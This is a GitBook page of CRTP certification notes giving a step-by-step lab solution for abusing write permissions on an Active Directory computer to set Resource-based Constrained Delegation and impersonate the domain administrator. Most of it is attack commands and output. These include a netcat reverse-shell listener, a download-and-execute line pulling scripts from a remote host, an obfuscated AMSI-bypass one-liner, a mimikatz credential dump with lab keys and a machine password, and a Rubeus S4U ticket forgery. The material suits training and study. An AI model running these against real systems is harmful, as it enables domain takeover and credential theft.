Certified Red Team Professional (CRTP) - Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝Certified Red Team Professional (CRTP) - Notes
    • ℹ️0 - Course Summary
    • 1️⃣1 - Active Directory (AD)
      • 1.1 - Introduction to Active Directory (AD)
      • 1.2 - Physical Components of AD
      • 1.3 - Logical Components of AD
    • 2️⃣2 - PowerShell
      • 2.1 - Introduction to PowerShell
      • 2.2 - Security and Detection
    • 3️⃣3 - AD Enumeration
      • 3.1 - Host & User Identification
      • 3.2 - Common Services Enum
        • 3.2.1 - LDAP & DNS Enum
        • 3.2.2 - SMB Enum & Common Attacks
      • 3.3 - Domain Enumeration
        • 3.3.1 - PowerView
          • 3.3.1.1 - Domain Enumeration (Video Lab)
        • 3.3.2 - BloodHound
    • 4️⃣4 - Trust and Privileges Mapping
      • 4.1 - Access Control (ACL/ACE)
      • 4.2 - Group Policy
      • 4.3 - Trusts
    • 5️⃣5 - Local Privilege Escalation
      • 5.1 - Privilege Escalation
        • 5.1.1 - Feature Abuse
        • 5.1.2 - Relaying
        • 5.1.3 - GPO Abuse
        • 5.1.4 - Unquoted Service Path
      • 5.2 - Tools
    • 7️⃣6 - Lateral Movement
      • 6.1 - PowerShell Remoting & Tradecraft
      • 6.2 - Credentials Extraction & Mimikatz
    • 9️⃣7 - Kerberos Attack and Privelege Escalation
      • 7.1 - Kerberos Intro
      • 7.2 - User Enum in Kerberos
      • 7.3 - AS-REP Roasting
      • 7.4 - Kerberoasting
      • 7.5 - Kerberos Delegation
        • Uncostrained Delegation
        • Constrained Delegation
      • 7.6 - Accross Trusts
        • Page
        • External Trust
        • Forest
        • Domain Trust
    • 8️⃣8 - Persistence
      • 8.1 - Golden Ticket
      • 8.2 - Silver Ticket
      • 8.3 - Diamond Ticket
      • 8.4 - Skeleton Key
      • 8.5 - DSRM
      • 8.6 - Custom SSP
      • 8.7 - Persistence via ACLs
        • 8.7.1 - AdminSDHolder
        • 8.7.2 - DCSync Attack
        • 8.7.3 - Security Descriptors
    • 9️⃣9 - Detection and Defense
    • Lab
      • 0 - Lab Instructions
      • 1 - LO 1️
      • 2 - LO2️
      • 3 - LO 3️
      • 4 - LO 4️
      • 5 - LO 5️
      • 6 - LO 6️
      • 7 - LO 7️
      • 8 - LO8️
      • 9 - LO9️
      • 10 - LO1️0️
      • 11 - LO1️1️
      • 12 - LO1️2️
      • 13 - LO1️3️
      • 14 - LO1️4️
      • 15 - LO1️5️
      • 16 - LO1️6️
      • 17 - LO1️7️
      • 18 - LO1️8️
      • 19 - LO1️9️
      • 20 - LO2️0️
      • 21 - LO2️1️
      • 22 - LO 2️2️
      • 23 - LO2️3️
    • 📄Report
      • How to write a PT Report
  • 🛣️RoadMap / Exam Preparation
  • 📔CRTP Cheat Sheet
Powered by GitBook
On this page
  • Tasks
  • Solutions
  • 1 - Find a computer object in dcorp domain where we have Write permissions
  • 2 - Abuse the Write permissions to access that computer as Domain Admin
  • Flag 28 [dcorp-dc] - Computer account on which ciadmin can configure Resource-based Constrained Delegation 🚩
  1. Certified Red Team Professional (CRTP) - Notes
  2. Lab

17 - LO1️7️

Learning Object 17

Tasks

1 - Find a computer object in dcorp domain where we have Write permissions

2 - Abuse the Write permissions to access that computer as Domain Admin

Flag 28 [dcorp-dc] - Computer account on which ciadmin can configure Resource-based Constrained Delegation 🚩

Solutions

1 - Find a computer object in dcorp domain where we have Write permissions

Let's use PowerView from a PowerShell session started using Invisi-Shell to enumerate Write permissions for a user that we have compromised.

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Powerview.ps1
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}
ObjectDN                : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : ListChildren, ReadProperty, GenericWrite
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-719815819-3726368948-3917688648-1121
IdentityReferenceName   : ciadmin
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN     : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass  : user

2 - Abuse the Write permissions to access that computer as Domain Admin

Let's use the reverse shell that we have and load PowerView there:

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 1339
iex (iwr http://172.16.100.67/sbloggingbypass.txt -UseBasicParsing)
S`eT-It`em ( 'V'+'aR' +  'IA' + (("{1}{0}"-f'1','blE:')+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.67/PowerView.ps1'))

Now, set RBCD on dcorp-mgmt for the student VMs. You may like to set it for all the student VMs in your lab instance so that your fellow students can also try it:

Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std867$' -Verbose

and check if RBCD is set correctly:

Get-DomainRBCD

Get AES keys of your student VM (as we configured RBCD for it above). Run the below command from an elevated shell:

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::evasive-keys" "exit"
mimikatz(commandline) # sekurlsa::evasive-keys

Authentication Id : 0 ; 5060531 (00000000:004d37b3)
Session           : Interactive from 0
User Name         : student867
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 5/18/2025 10:07:04 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-20607

         * Username : student867
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
           rc4_hmac_nt       320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old      320e675610942d625c9a2aeaaf357b4a
           rc4_md4           320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_nt_exp   320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old_exp  320e675610942d625c9a2aeaaf357b4a

Authentication Id : 0 ; 282875 (00000000:000450fb)
Session           : RemoteInteractive from 2
User Name         : student867
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 5/18/2025 3:18:24 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-20607

         * Username : student867
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
           rc4_hmac_nt       320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old      320e675610942d625c9a2aeaaf357b4a
           rc4_md4           320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_nt_exp   320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old_exp  320e675610942d625c9a2aeaaf357b4a

Authentication Id : 0 ; 257517 (00000000:0003eded)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/18/2025 3:18:22 PM
SID               : S-1-5-90-0-2

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 257479 (00000000:0003edc7)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/18/2025 3:18:22 PM
SID               : S-1-5-90-0-2

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 256758 (00000000:0003eaf6)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/18/2025 3:18:22 PM
SID               : S-1-5-96-0-2

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 51592 (00000000:0000c988)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:25 PM
SID               : S-1-5-90-0-1

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 51562 (00000000:0000c96a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:25 PM
SID               : S-1-5-90-0-1

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DCORP-STD867$
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:24 PM
SID               : S-1-5-20

         * Username : dcorp-std867$
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       02698bbddb51903271ff8400c7ce6c83af2f638a0c450f8a18005160c8558f93
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 27191 (00000000:00006a37)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:24 PM
SID               : S-1-5-96-0-0

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 4584063 (00000000:0045f27f)
Session           : Interactive from 0
User Name         : student867
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 5/18/2025 9:08:19 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-20607

         * Username : student867
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
           rc4_hmac_nt       320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old      320e675610942d625c9a2aeaaf357b4a
           rc4_md4           320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_nt_exp   320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old_exp  320e675610942d625c9a2aeaaf357b4a

Authentication Id : 0 ; 282931 (00000000:00045133)
Session           : RemoteInteractive from 2
User Name         : student867
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 5/18/2025 3:18:24 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-20607

         * Username : student867
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
           rc4_hmac_nt       320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old      320e675610942d625c9a2aeaaf357b4a
           rc4_md4           320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_nt_exp   320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old_exp  320e675610942d625c9a2aeaaf357b4a

Authentication Id : 0 ; 27152 (00000000:00006a10)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:24 PM
SID               : S-1-5-96-0-1

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DCORP-STD867$
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:23 PM
SID               : S-1-5-18

         * Username : dcorp-std867$
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       02698bbddb51903271ff8400c7ce6c83af2f638a0c450f8a18005160c8558f93
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

mimikatz(commandline) # exit

With Rubeus, abuse the RBCD to access dcorp-mgmt as Domain Administrator - Administrator, considering dcorp-std867$:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-std867$ /aes256:02698bbddb51903271ff8400c7ce6c83af2f638a0c450f8a18005160c8558f93 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt

Check if we can access dcorp-mgmt:

winrs -r:dcorp-mgmt cmd
set username
set computername

Flag 28 [dcorp-dc] - Computer account on which ciadmin can configure Resource-based Constrained Delegation 🚩

ObjectDN                : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : ListChildren, ReadProperty, GenericWrite
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-719815819-3726368948-3917688648-1121
IdentityReferenceName   : ciadmin
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN     : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass  : user

DCORP-MGMT is the computer account on which ciadmin can configure Resource-based Constrained Delegation.

Previous16 - LO1️6️Next18 - LO1️8️

Last updated 17 days ago

Recall that we compromised ciadmin from dcorp-ci (). We can either use the reverse shell we have on dcorp-ci as ciadmin or extract the credentials from dcorp-ci.

📝
on learning object 5